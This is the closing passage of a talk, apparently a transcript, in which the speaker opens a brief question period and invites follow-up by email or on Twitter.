I'm going to take two minutes of questions now. If you have any more after that, feel free to come and speak to me at the back, or shoot me an email. Don't forget to follow me on Twitter. Thank you for listening.